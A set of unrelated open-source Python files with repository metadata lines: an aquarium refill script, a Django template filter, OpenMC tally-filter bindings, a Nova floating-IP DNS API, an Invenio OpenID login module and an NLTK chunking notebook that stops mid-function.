time.sleep(1)
i=i+1
            if GPIO.input(FLOATSW_HIGH_WL) == 0:
                Alert("Water level in sump is now high, stopping the refill")
                Close_valve()
                sys.exit(3)
            if killer.kill_now:
                Alert("Caught a Sigterm, Sigkill or CTRL+C, exiting.")
                Close_valve()
                sys.exit(2)
Alert("Refill done, exiting.")
Close_valve()
sys.exit(0)
except (RuntimeError, IOError):
Alert("Caught an exception, exiting.")
Close_valve()
sys.exit(4)
# Exit code :
# 5 : already refilling or cannot create lock file
# 4 : Caught an exception
# 3 : water is high either at start or during the refill
# 2 : a sigkill, sigterm or keyboard CTRL+C signal was received
# 1 : incorrect parameter received
# 0 : all went fine
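# Example invocations (a sketch; assumes the script is saved as rodi.py and
# run with sufficient privileges to drive the GPIO ports):
#   python rodi.py 60      # refill for 60 seconds
#   python rodi.py close   # force the valve closed and exit 0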
| aquamonitor/Aquamonitor | rodi.py | Python | lgpl-3.0 | 4,109 | 0.011682 |
from django import template
register = template.Library()
@register.filter
def package_usage(user):
return user.package_set.all()
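# Minimal usage sketch (illustrative only; assumes a `user` variable in the
# template context):
#   {% load profile_tags %}
#   {% for package in user|package_usage %}{{ package }}{% endfor %}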
| miketheman/opencomparison | profiles/templatetags/profile_tags.py | Python | mit | 137 | 0 |
from collections.abc import Mapping
from ctypes import c_int, c_int32, c_double, c_char_p, POINTER, \
create_string_buffer, c_size_t
from weakref import WeakValueDictionary
import numpy as np
from numpy.ctypeslib import as_array
from openmc.exceptions import AllocationError, InvalidIDError
from . import _dll
from .core import _FortranObjectWithID
from .error import _error_handler
from .material import Material
from .mesh import RegularMesh
__all__ = [
'Filter', 'AzimuthalFilter', 'CellFilter', 'CellbornFilter', 'CellfromFilter',
'CellInstanceFilter', 'DistribcellFilter', 'DelayedGroupFilter', 'EnergyFilter',
'EnergyoutFilter', 'EnergyFunctionFilter', 'LegendreFilter', 'MaterialFilter',
'MeshFilter', 'MeshSurfaceFilter', 'MuFilter', 'ParticleFilter', 'PolarFilter',
'SphericalHarmonicsFilter', 'SpatialLegendreFilter', 'SurfaceFilter',
'UniverseFilter', 'ZernikeFilter', 'ZernikeRadialFilter', 'filters'
]
# Tally functions
_dll.openmc_cell_filter_get_bins.argtypes = [
c_int32, POINTER(POINTER(c_int32)), POINTER(c_int32)]
_dll.openmc_cell_filter_get_bins.restype = c_int
_dll.openmc_cell_filter_get_bins.errcheck = _error_handler
_dll.openmc_energy_filter_get_bins.argtypes = [
c_int32, POINTER(POINTER(c_double)), POINTER(c_size_t)]
_dll.openmc_energy_filter_get_bins.restype = c_int
_dll.openmc_energy_filter_get_bins.errcheck = _error_handler
_dll.openmc_energy_filter_set_bins.argtypes = [c_int32, c_size_t, POINTER(c_double)]
_dll.openmc_energy_filter_set_bins.restype = c_int
_dll.openmc_energy_filter_set_bins.errcheck = _error_handler
_dll.openmc_energyfunc_filter_set_data.restype = c_int
_dll.openmc_energyfunc_filter_set_data.errcheck = _error_handler
_dll.openmc_energyfunc_filter_set_data.argtypes = [
c_int32, c_size_t, POINTER(c_double), POINTER(c_double)]
_dll.openmc_energyfunc_filter_get_energy.restype = c_int
_dll.openmc_energyfunc_filter_get_energy.errcheck = _error_handler
_dll.openmc_energyfunc_filter_get_energy.argtypes = [
c_int32, POINTER(c_size_t), POINTER(POINTER(c_double))]
_dll.openmc_energyfunc_filter_get_y.restype = c_int
_dll.openmc_energyfunc_filter_get_y.errcheck = _error_handler
_dll.openmc_energyfunc_filter_get_y.argtypes = [
c_int32, POINTER(c_size_t), POINTER(POINTER(c_double))]
_dll.openmc_filter_get_id.argtypes = [c_int32, POINTER(c_int32)]
_dll.openmc_filter_get_id.restype = c_int
_dll.openmc_filter_get_id.errcheck = _error_handler
_dll.openmc_filter_get_type.argtypes = [c_int32, c_char_p]
_dll.openmc_filter_get_type.restype = c_int
_dll.openmc_filter_get_type.errcheck = _error_handler
_dll.openmc_filter_set_id.argtypes = [c_int32, c_int32]
_dll.openmc_filter_set_id.restype = c_int
_dll.openmc_filter_set_id.errcheck = _error_handler
_dll.openmc_get_filter_index.argtypes = [c_int32, POINTER(c_int32)]
_dll.openmc_get_filter_index.restype = c_int
_dll.openmc_get_filter_index.errcheck = _error_handler
_dll.openmc_legendre_filter_get_order.argtypes = [c_int32, POINTER(c_int)]
_dll.openmc_legendre_filter_get_order.restype = c_int
_dll.openmc_legendre_filter_get_order.errcheck = _error_handler
_dll.openmc_legendre_filter_set_order.argtypes = [c_int32, c_int]
_dll.openmc_legendre_filter_set_order.restype = c_int
_dll.openmc_legendre_filter_set_order.errcheck = _error_handler
_dll.openmc_material_filter_get_bins.argtypes = [
c_int32, POINTER(POINTER(c_int32)), POINTER(c_size_t)]
_dll.openmc_material_filter_get_bins.restype = c_int
_dll.openmc_material_filter_get_bins.errcheck = _error_handler
_dll.openmc_material_filter_set_bins.argtypes = [c_int32, c_size_t, POINTER(c_int32)]
_dll.openmc_material_filter_set_bins.restype = c_int
_dll.openmc_material_filter_set_bins.errcheck = _error_handler
_dll.openmc_mesh_filter_get_mesh.argtypes = [c_int32, POINTER(c_int32)]
_dll.openmc_mesh_filter_get_mesh.restype = c_int
_dll.openmc_mesh_filter_get_mesh.errcheck = _error_handler
_dll.openmc_mesh_filter_set_mesh.argtypes = [c_int32, c_int32]
_dll.openmc_mesh_filter_set_mesh.restype = c_int
_dll.openmc_mesh_filter_set_mesh.errcheck = _error_handler
_dll.openmc_meshsurface_filter_get_mesh.argtypes = [c_int32, POINTER(c_int32)]
_dll.openmc_meshsurface_filter_get_mesh.restype = c_int
_dll.openmc_meshsurface_filter_get_mesh.errcheck = _error_handler
_dll.openmc_meshsurface_filter_set_mesh.argtypes = [c_int32, c_int32]
_dll.openmc_meshsurface_filter_set_mesh.restype = c_int
_dll.openmc_meshsurface_filter_set_mesh.errcheck = _error_handler
_dll.openmc_new_filter.argtypes = [c_char_p, POINTER(c_int32)]
_dll.openmc_new_filter.restype = c_int
_dll.openmc_new_filter.errcheck = _error_handler
_dll.openmc_spatial_legendre_filter_get_order.argtypes = [c_int32, POINTER(c_int)]
_dll.openmc_spatial_legendre_filter_get_order.restype = c_int
_dll.openmc_spatial_legendre_filter_get_order.errcheck = _error_handler
_dll.openmc_spatial_legendre_filter_set_order.argtypes = [c_int32, c_int]
_dll.openmc_spatial_legendre_filter_set_order.restype = c_int
_dll.openmc_spatial_legendre_filter_set_order.errcheck = _error_handler
_dll.openmc_sphharm_filter_get_order.argtypes = [c_int32, POINTER(c_int)]
_dll.openmc_sphharm_filter_get_order.restype = c_int
_dll.openmc_sphharm_filter_get_order.errcheck = _error_handler
_dll.openmc_sphharm_filter_set_order.argtypes = [c_int32, c_int]
_dll.openmc_sphharm_filter_set_order.restype = c_int
_dll.openmc_sphharm_filter_set_order.errcheck = _error_handler
_dll.openmc_zernike_filter_get_order.argtypes = [c_int32, POINTER(c_int)]
_dll.openmc_zernike_filter_get_order.restype = c_int
_dll.openmc_zernike_filter_get_order.errcheck = _error_handler
_dll.openmc_zernike_filter_set_order.argtypes = [c_int32, c_int]
_dll.openmc_zernike_filter_set_order.restype = c_int
_dll.openmc_zernike_filter_set_order.errcheck = _error_handler
_dll.tally_filters_size.restype = c_size_t
class Filter(_FortranObjectWithID):
__instances = WeakValueDictionary()
def __new__(cls, obj=None, uid=None, new=True, index=None):
mapping = filters
if index is None:
if new:
# Determine ID to assign
if uid is None:
uid = max(mapping, default=0) + 1
else:
if uid in mapping:
raise AllocationError('A filter with ID={} has already '
'been allocated.'.format(uid))
# Set the filter type -- note that the filter_type attribute
# only exists on subclasses!
index = c_int32()
_dll.openmc_new_filter(cls.filter_type.encode(), index)
index = index.value
else:
index = mapping[uid]._index
if index not in cls.__instances:
instance = super().__new__(cls)
instance._index = index
if uid is not None:
instance.id = uid
cls.__instances[index] = instance
return cls.__instances[index]
@property
def id(self):
filter_id = c_int32()
_dll.openmc_filter_get_id(self._index, filter_id)
return filter_id.value
@id.setter
def id(self, filter_id):
_dll.openmc_filter_set_id(self._index, filter_id)
class EnergyFilter(Filter):
filter_type = 'energy'
def __init__(self, bins=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if bins is not None:
self.bins = bins
@property
def bins(self):
energies = POINTER(c_double)()
n = c_size_t()
_dll.openmc_energy_filter_get_bins(self._index, energies, n)
return as_array(energies, (n.value,))
@bins.setter
def bins(self, bins):
# Get numpy array as a double*
energies = np.asarray(bins)
energies_p = energies.ctypes.data_as(POINTER(c_double))
_dll.openmc_energy_filter_set_bins(
self._index, len(energies), energies_p)
class EnergyoutFilter(EnergyFilter):
filter_type = 'energyout'
class AzimuthalFilter(Filter):
filter_type = 'azimuthal'
class CellFilter(Filter):
filter_type = 'cell'
@property
def bins(self):
cells = POINTER(c_int32)()
n = c_int32()
_dll.openmc_cell_filter_get_bins(self._index, cells, n)
return as_array(cells, (n.value,))
class CellbornFilter(Filter):
filter_type = 'cellborn'
class CellfromFilter(Filter):
filter_type = 'cellfrom'
class CellInstanceFilter(Filter):
filter_type = 'cellinstance'
class DelayedGroupFilter(Filter):
filter_type = 'delayedgroup'
class DistribcellFilter(Filter):
filter_type = 'distribcell'
class EnergyFunctionFilter(Filter):
filter_type = 'energyfunction'
def __new__(cls, energy=None, y=None, uid=None, new=True, index=None):
return super().__new__(cls, uid=uid, new=new, index=index)
def __init__(self, energy=None, y=None, uid=None, new=True, index=None):
if (energy is None) != (y is None):
raise AttributeError("Need both energy and y or neither")
super().__init__(uid, new, index)
if energy is not None:
self.set_data(energy, y)
def set_data(self, energy, y):
"""Set the interpolation information for the filter
Parameters
----------
energy : numpy.ndarray
Independent variable for the interpolation
y : numpy.ndarray
Dependent variable for the interpolation
"""
energy_array = np.asarray(energy)
y_array = np.asarray(y)
energy_p = energy_array.ctypes.data_as(POINTER(c_double))
y_p = y_array.ctypes.data_as(POINTER(c_double))
_dll.openmc_energyfunc_filter_set_data(
self._index, len(energy_array), energy_p, y_p)
@property
def energy(self):
return self._get_attr(_dll.openmc_energyfunc_filter_get_energy)
@property
def y(self):
return self._get_attr(_dll.openmc_energyfunc_filter_get_y)
def _get_attr(self, cfunc):
array_p = POINTER(c_double)()
n = c_size_t()
cfunc(self._index, n, array_p)
return as_array(array_p, (n.value, ))
class LegendreFilter(Filter):
filter_type = 'legendre'
def __init__(self, order=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if order is not None:
self.order = order
@property
def order(self):
temp_order = c_int()
_dll.openmc_legendre_filter_get_order(self._index, temp_order)
return temp_order.value
@order.setter
def order(self, order):
_dll.openmc_legendre_filter_set_order(self._index, order)
class MaterialFilter(Filter):
filter_type = 'material'
def __init__(self, bins=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if bins is not None:
self.bins = bins
@property
def bins(self):
materials = POINTER(c_int32)()
n = c_size_t()
_dll.openmc_material_filter_get_bins(self._index, materials, n)
return [Material(index=materials[i]) for i in range(n.value)]
@bins.setter
def bins(self, materials):
# Get material indices as int32_t[]
n = len(materials)
bins = (c_int32*n)(*(m._index for m in materials))
_dll.openmc_material_filter_set_bins(self._index, n, bins)
class MeshFilter(Filter):
filter_type = 'mesh'
def __init__(self, mesh=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if mesh is not None:
self.mesh = mesh
@property
def mesh(self):
index_mesh = c_int32()
_dll.openmc_mesh_filter_get_mesh(self._index, index_mesh)
return RegularMesh(index=index_mesh.value)
@mesh.setter
def mesh(self, mesh):
_dll.openmc_mesh_filter_set_mesh(self._index, mesh._index)
class MeshSurfaceFilter(Filter):
filter_type = 'meshsurface'
def __init__(self, mesh=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if mesh is not None:
self.mesh = mesh
@property
def mesh(self):
index_mesh = c_int32()
_dll.openmc_meshsurface_filter_get_mesh(self._index, index_mesh)
return RegularMesh(index=index_mesh.value)
@mesh.setter
def mesh(self, mesh):
_dll.openmc_meshsurface_filter_set_mesh(self._index, mesh._index)
class MuFilter(Filter):
filter_type = 'mu'
class ParticleFilter(Filter):
filter_type = 'particle'
class PolarFilter(Filter):
filter_type = 'polar'
class SphericalHarmonicsFilter(Filter):
filter_type = 'sphericalharmonics'
def __init__(self, order=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if order is not None:
self.order = order
@property
def order(self):
temp_order = c_int()
_dll.openmc_sphharm_filter_get_order(self._index, temp_order)
return temp_order.value
@order.setter
def order(self, order):
_dll.openmc_sphharm_filter_set_order(self._index, order)
class SpatialLegendreFilter(Filter):
filter_type = 'spatiallegendre'
def __init__(self, order=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if order is not None:
self.order = order
@property
def order(self):
temp_order = c_int()
_dll.openmc_spatial_legendre_filter_get_order(self._index, temp_order)
return temp_order.value
@order.setter
def order(self, order):
_dll.openmc_spatial_legendre_filter_set_order(self._index, order)
class SurfaceFilter(Filter):
filter_type = 'surface'
class UniverseFilter(Filter):
filter_type = 'universe'
class ZernikeFilter(Filter):
filter_type = 'zernike'
def __init__(self, order=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if order is not None:
self.order = order
@property
def order(self):
temp_order = c_int()
_dll.openmc_zernike_filter_get_order(self._index, temp_order)
return temp_order.value
@order.setter
def order(self, order):
_dll.openmc_zernike_filter_set_order(self._index, order)
class ZernikeRadialFilter(ZernikeFilter):
filter_type = 'zernikeradial'
_FILTER_TYPE_MAP = {
'azimuthal': AzimuthalFilter,
'cell': CellFilter,
'cellborn': CellbornFilter,
'cellfrom': CellfromFilter,
'cellinstance': CellInstanceFilter,
'delayedgroup': DelayedGroupFilter,
'distribcell': DistribcellFilter,
'energy': EnergyFilter,
'energyout': EnergyoutFilter,
'energyfunction': EnergyFunctionFilter,
'legendre': LegendreFilter,
'material': MaterialFilter,
'mesh': MeshFilter,
'meshsurface': MeshSurfaceFilter,
'mu': MuFilter,
'particle': ParticleFilter,
'polar': PolarFilter,
'sphericalharmonics': SphericalHarmonicsFilter,
'spatiallegendre': SpatialLegendreFilter,
'surface': SurfaceFilter,
'universe': UniverseFilter,
'zernike': ZernikeFilter,
'zernikeradial': ZernikeRadialFilter
}
def _get_filter(index):
filter_type = create_string_buffer(20)
_dll.openmc_filter_get_type(index, filter_type)
filter_type = filter_type.value.decode()
return _FILTER_TYPE_MAP[filter_type](index=index)
class _FilterMapping(Mapping):
def __getitem__(self, key):
index = c_int32()
try:
_dll.openmc_get_filter_index(key, index)
except (AllocationError, InvalidIDError) as e:
# __contains__ expects a KeyError to work correctly
raise KeyError(str(e))
return _get_filter(index.value)
def __iter__(self):
for i in range(len(self)):
yield _get_filter(i).id
def __len__(self):
return _dll.tally_filters_size()
def __repr__(self):
return repr(dict(self))
filters = _FilterMapping()
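# Minimal usage sketch (illustrative only; assumes the OpenMC shared library
# has been initialized, e.g. via openmc.lib.init(), so filter state exists):
#     f = EnergyFilter([0.0, 0.625, 2.0e7])   # two-bin energy filter
#     f.id = 7                                # IDs can be (re)assigned
#     assert filters[7].bins.tolist() == [0.0, 0.625, 2.0e7]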
| mit-crpg/openmc | openmc/lib/filter.py | Python | mit | 16,055 | 0.000561 |
# Copyright 2011 Andrew Bogott for the Wikimedia Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import urllib
import webob
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import exception
from nova.i18n import _
from nova import network
from nova import utils
ALIAS = "os-floating-ip-dns"
authorize = extensions.extension_authorizer('compute', 'v3:' + ALIAS)
def _translate_dns_entry_view(dns_entry):
result = {}
result['ip'] = dns_entry.get('ip')
result['id'] = dns_entry.get('id')
result['type'] = dns_entry.get('type')
result['domain'] = dns_entry.get('domain')
result['name'] = dns_entry.get('name')
return {'dns_entry': result}
def _translate_dns_entries_view(dns_entries):
return {'dns_entries': [_translate_dns_entry_view(entry)['dns_entry']
for entry in dns_entries]}
def _translate_domain_entry_view(domain_entry):
result = {}
result['domain'] = domain_entry.get('domain')
result['scope'] = domain_entry.get('scope')
result['project'] = domain_entry.get('project')
result['availability_zone'] = domain_entry.get('availability_zone')
return {'domain_entry': result}
def _translate_domain_entries_view(domain_entries):
return {'domain_entries':
[_translate_domain_entry_view(entry)['domain_entry']
for entry in domain_entries]}
def _unquote_domain(domain):
"""Unquoting function for receiving a domain name in a URL.
Domain names tend to have .'s in them. Urllib doesn't quote dots,
but Routes tends to choke on them, so we need an extra level of
by-hand quoting here.
"""
return urllib.unquote(domain).replace('%2E', '.')
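# For example (illustrative only): a URL path segment 'example%2Ecom'
# is turned back into the domain name 'example.com'.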
def _create_dns_entry(ip, name, domain):
return {'ip': ip, 'name': name, 'domain': domain}
def _create_domain_entry(domain, scope=None, project=None, av_zone=None):
return {'domain': domain, 'scope': scope, 'project': project,
'availability_zone': av_zone}
class FloatingIPDNSDomainController(object):
"""DNS domain controller for OpenStack API."""
def __init__(self):
super(FloatingIPDNSDomainController, self).__init__()
self.network_api = network.API()
@extensions.expected_errors(501)
def index(self, req):
"""Return a list of available DNS domains."""
context = req.environ['nova.context']
authorize(context)
try:
domains = self.network_api.get_dns_domains(context)
except NotImplementedError:
msg = _("Unable to create dns domain")
raise webob.exc.HTTPNotImplemented(explanation=msg)
domainlist = [_create_domain_entry(domain['domain'],
domain.get('scope'),
domain.get('project'),
domain.get('availability_zone'))
for domain in domains]
return _translate_domain_entries_view(domainlist)
@extensions.expected_errors((422, 501))
def update(self, req, id, body):
"""Add or modify domain entry."""
context = req.environ['nova.context']
authorize(context)
fqdomain = _unquote_domain(id)
try:
entry = body['domain_entry']
scope = entry['scope']
except (TypeError, KeyError):
raise webob.exc.HTTPUnprocessableEntity()
project = entry.get('project', None)
av_zone = entry.get('availability_zone', None)
        # Valid combinations: 'public' scope may carry a project, and
        # 'private' scope may carry an availability zone; anything else
        # (including both at once) is rejected.
        if (scope not in ('private', 'public') or
                project and av_zone or
                scope == 'private' and project or
                scope == 'public' and av_zone):
            raise webob.exc.HTTPUnprocessableEntity()
try:
if scope == 'private':
create_dns_domain = self.network_api.create_private_dns_domain
area_name, area = 'availability_zone', av_zone
else:
create_dns_domain = self.network_api.create_public_dns_domain
area_name, area = 'project', project
except NotImplementedError:
msg = _("Unable to create dns domain")
raise webob.exc.HTTPNotImplemented(explanation=msg)
create_dns_domain(context, fqdomain, area)
return _translate_domain_entry_view({'domain': fqdomain,
'scope': scope,
area_name: area})
@extensions.expected_errors((404, 501))
@wsgi.response(202)
def delete(self, req, id):
"""Delete the domain identified by id."""
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(id)
# Delete the whole domain
try:
self.network_api.delete_dns_domain(context, domain)
except NotImplementedError:
msg = _("Unable to delete dns domain")
raise webob.exc.HTTPNotImplemented(explanation=msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
class FloatingIPDNSEntryController(object):
"""DNS Entry controller for OpenStack API."""
def __init__(self):
super(FloatingIPDNSEntryController, self).__init__()
self.network_api = network.API()
@extensions.expected_errors((422, 404, 501))
def show(self, req, domain_id, id):
"""Return the DNS entry that corresponds to domain_id and id."""
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(domain_id)
floating_ip = None
# Check whether id is a valid ipv4/ipv6 address.
if utils.is_valid_ipv4(id) or utils.is_valid_ipv6(id):
floating_ip = id
try:
if floating_ip:
entries = self.network_api.get_dns_entries_by_address(context,
floating_ip,
domain)
else:
entries = self.network_api.get_dns_entries_by_name(context,
id,
domain)
except NotImplementedError:
msg = _("Unable to get dns domain")
raise webob.exc.HTTPNotImplemented(explanation=msg)
if not entries:
explanation = _("DNS entries not found.")
raise webob.exc.HTTPNotFound(explanation=explanation)
if floating_ip:
entrylist = [_create_dns_entry(floating_ip, entry, domain)
for entry in entries]
dns_entries = _translate_dns_entries_view(entrylist)
return wsgi.ResponseObject(dns_entries)
entry = _create_dns_entry(entries[0], id, domain)
return _translate_dns_entry_view(entry)
@extensions.expected_errors((422, 501))
def update(self, req, domain_id, id, body):
"""Add or modify dns entry."""
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(domain_id)
name = id
try:
entry = body['dns_entry']
address = entry['ip']
dns_type = entry['dns_type']
except (TypeError, KeyError):
raise webob.exc.HTTPUnprocessableEntity()
try:
entries = self.network_api.get_dns_entries_by_name(context,
name, domain)
if not entries:
# create!
self.network_api.add_dns_entry(context, address, name,
dns_type, domain)
else:
# modify!
self.network_api.modify_dns_entry(context, name,
address, domain)
except NotImplementedError:
msg = _("Unable to update dns domain")
raise webob.exc.HTTPNotImplemented(explanation=msg)
return _translate_dns_entry_view({'ip': address,
'name': name,
'type': dns_type,
'domain': domain})
@extensions.expected_errors((404, 501))
@wsgi.response(202)
def delete(self, req, domain_id, id):
"""Delete the entry identified by req and id."""
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(domain_id)
name = id
try:
self.network_api.delete_dns_entry(context, name, domain)
except NotImplementedError:
msg = _("Unable to delete dns domain")
raise webob.exc.HTTPNotImplemented(explanation=msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
class FloatingIpDns(extensions.V3APIExtensionBase):
"""Floating IP DNS support."""
name = "FloatingIpDns"
alias = ALIAS
version = 1
def get_resources(self):
resources = []
res = extensions.ResourceExtension(ALIAS,
controller=FloatingIPDNSDomainController())
resources.append(res)
res = extensions.ResourceExtension('entries',
controller=FloatingIPDNSEntryController(),
parent={'member_name': 'domain',
'collection_name': 'os-floating-ip-dns'})
resources.append(res)
return resources
def get_controller_extensions(self):
"""It's an abstract function V3APIExtensionBase and the extension
will not be loaded without it.
"""
return []
| badock/nova | nova/api/openstack/compute/plugins/v3/floating_ip_dns.py | Python | apache-2.0 | 10,441 | 0.000958 |
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2012 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
This module contains functions and methods to authenticate with OpenID
providers.
"""
__revision__ = \
"$Id$"
from invenio.config import CFG_SITE_SECURE_URL
from invenio.external_authentication import ExternalAuth
from invenio.session import get_session
class ExternalOpenID(ExternalAuth):
"""
Contains methods for authenticate with an OpenID provider.
"""
@staticmethod
def __init_req(req):
req.g['openid_provider_name'] = ''
req.g['openid_debug'] = 0
req.g['openid_msg'] = ''
req.g['openid_debug_msg'] = ''
req.g['openid_response'] = None
def auth_user(self, username, password, req=None):
"""
Tries to find email and OpenID identity of the user. If it
doesn't find any of them, returns (None, None)
@param username: Isn't used in this function
@type username: str
@param password: Isn't used in this function
@type password: str
@param req: request
@type req: invenio.webinterface_handler_wsgi.SimulatedModPythonRequest
@rtype: str|NoneType, str|NoneType
"""
from openid.consumer import consumer
self._get_response(req)
response = req.g['openid_response']
identity = None
email = None
if response.status == consumer.SUCCESS:
# In the first login of the user, fetches his/her email
# from OpenID provider.
email = self._get_email_from_success_response(req)
identity = response.getDisplayIdentifier()
elif response.status == consumer.CANCEL:
# If user cancels the verification, set corresponding message.
            req.g['openid_msg'] = 21
elif response.status == consumer.FAILURE:
# If verification fails, set corresponding message.
            req.g['openid_msg'] = 22
return email, identity
@staticmethod
def get_msg(req):
return req.g['openid_msg']
def fetch_user_nickname(self, username, password=None, req=None):
"""
Fetches the OpenID provider for nickname of the user. If it doesn't
find any, returns None.
        This function doesn't need username, password or req. They exist
        just because this class is derived from ExternalAuth.
@param username: Isn't used in this function
@type username: str
@param password: Isn't used in this function
@type password: str
@param req: request
@type req: invenio.webinterface_handler_wsgi.SimulatedModPythonRequest
@rtype: str|NoneType
"""
from openid.extensions import ax
from openid.extensions import sreg
nickname = None
# May be either Simple Registration (sreg) response or
# Attribute Exchange (ax) response.
sreg_resp = None
ax_resp = None
response = req.g['openid_response']
sreg_resp = sreg.SRegResponse.fromSuccessResponse(response)
if sreg_resp:
if sreg_resp.getExtensionArgs().has_key('nickname'):
nickname = sreg_resp.getExtensionArgs()['nickname']
ax_resp = ax.FetchResponse.fromSuccessResponse(response)
if ax_resp and not nickname:
extensions = ax_resp.getExtensionArgs()
if extensions.has_key('type.ext0') and \
extensions.has_key('value.ext0.1'):
if extensions['type.ext0'] == \
'http://axschema.org/namePerson/friendly':
nickname = extensions['value.ext0.1']
if extensions.has_key('type.ext1') and \
extensions.has_key('value.ext1.1') and not nickname:
if extensions['type.ext1'] == \
'http://axschema.org/namePerson/friendly':
nickname = extensions['value.ext1.1']
return nickname
@staticmethod
def _get_email_from_success_response(req):
"""
Fetches the email from consumer.SuccessResponse. If it doesn't find any
returns None.
@rtype: str|NoneType
"""
from openid.extensions import ax
email = None
response = req.g['openid_response']
ax_resp = ax.FetchResponse.fromSuccessResponse(response)
if ax_resp:
extensions = ax_resp.getExtensionArgs()
if extensions.has_key('type.ext0') and \
extensions.has_key('value.ext0.1'):
if extensions['type.ext0'] == \
'http://axschema.org/contact/email':
email = extensions['value.ext0.1']
if extensions.has_key('type.ext1') and \
extensions.has_key('value.ext1.1') and not email:
if extensions['type.ext1'] == \
'http://axschema.org/contact/email':
email = extensions['value.ext1.1']
return email
@staticmethod
def _get_response(req):
"""
Constructs the response returned from the OpenID provider
@param req: request
@type req: invenio.webinterface_handler_wsgi.SimulatedModPythonRequest
"""
from invenio.webinterface_handler import wash_urlargd
from openid.consumer import consumer
content = {}
for key in req.form.keys():
content[key] = (str, '')
args = wash_urlargd(req.form, content)
if args.has_key('ln'):
del args['ln']
if args.has_key('referer'):
if not args['referer']:
del args['referer']
oidconsumer = consumer.Consumer({"id": get_session(req)}, None)
url = CFG_SITE_SECURE_URL + "/youraccount/login"
req.g['openid_provider_name'] = args['provider']
req.g['openid_response'] = oidconsumer.complete(args, url)
| Panos512/invenio | modules/webaccess/lib/external_authentication_openid.py | Python | gpl-2.0 | 6,658 | 0.004356 |
#%%
# information extraction: getting meaning from text
import nltk, re, pprint
def preprocess(document):
sents = nltk.sent_tokenize(document)
sents = [nltk.word_tokenize(sent) for sent in sents]
sents = [nltk.pos_tag(sent) for sent in sents]
return sents
#%% chunking
# NP-chunking
# one of most useful sources of information for NP-chunking is POS tags
sentence = [("the", "DT"), ("little", "JJ"), ("yellow", "JJ"), ("dog", "NN"), ("barked", "VBD"), ("at", "IN"), ("the", "DT"), ("cat", "NN")]
grammar = "NP: {<DT>?<JJ>*<NN>}"
cp = nltk.RegexpParser(grammar)
result = cp.parse(sentence)
print(result)
result.draw()
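# Expected bracketed parse (a sketch of the output from the NLTK book):
#   (S
#     (NP the/DT little/JJ yellow/JJ dog/NN)
#     barked/VBD
#     at/IN
#     (NP the/DT cat/NN))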
#%%
from nltk.corpus import conll2000
print(conll2000.chunked_sents('train.txt')[99])
print(conll2000.chunked_sents('train.txt',chunk_types=['NP'])[99])
#%%
cp = nltk.RegexpParser("")
test_sents = conll2000.chunked_sents('test.txt',chunk_types=['NP'])
print(cp.evaluate(test_sents))
#%%
grammar = r"NP: {<[CDJNP].*>+}"
cp = nltk.RegexpParser(grammar)
print(cp.evaluate(test_sents))
#%%
class UnigramChunker(nltk.ChunkParserI):
def __init__(self,train_sents):
train_data = [[(t,c) for w,t,c in nltk.chunk.tree2conlltags(sent)] for sent in train_sents]
self.tagger = nltk.UnigramTagger(train_data)
def parse(self,sentence):
pos_tags = [pos for (word,pos) in sentence]
tagged_pos_tags = self.tagger.tag(pos_tags)
chunktags = [chunktag for (pos,chunktag) in tagged_pos_tags]
conlltags = [(word,pos,chunktag) for ((word,pos),chunktag) in zip(sentence,chunktags)]
return nltk.chunk.conlltags2tree(conlltags)
test_sents = conll2000.chunked_sents('test.txt', chunk_types=['NP'])
train_sents = conll2000.chunked_sents('train.txt',chunk_types=['NP'])
unigram_chunker = UnigramChunker(train_sents)
print(unigram_chunker.evaluate(test_sents))
#%% what learned
postags = sorted(set(pos for sent in train_sents
for (word,pos) in sent.leaves()))
print(unigram_chunker.tagger.tag(postags))
#%% classifier based chunker
# not only pos tag, but also word content
class ConsecutiveNPChunkTagger(nltk.TaggerI):
def __init__(self, train_sents):
train_set = []
for tagged_sent in train_sents:
untagged_sent = nltk.tag.untag(tagged_sent)
history = []
for i, (word, tag) in enumerate(tagged_sent):
featureset = npchunk_features(untagged_sent, i, history)
train_set.append( (featureset, tag) )
history.append(tag)
self.classifier = nltk.NaiveBayesClassifier.train(
train_set)
def tag(self, sentence):
history = []
for i, word in enumerate(sentence):
featureset = npchunk_features(sentence, i, history)
tag = self.classifier.classify(featureset)
history.append(tag)
return zip(sentence, history)
class ConsecutiveNPChunker(nltk.ChunkParserI):
def __init__(self, train_sents):
tagged_sents = [[((w,t),c) for (w,t,c) in
nltk.chunk.tree2conlltags(sent)]
for sent in train_sents]
self.tagger = ConsecutiveNPChunkTagger(tagged_sents)
def parse(self, sentence):
tagged_sents = self.tagger.tag(sentence)
conlltags = [(w,t,c) for ((w,t),c) in tagged_sents]
return nltk.chunk.conlltags2tree(conlltags)
#%%
def npchunk_features(sentence,i,history):
word,pos = sentence[i]
if i == 0:
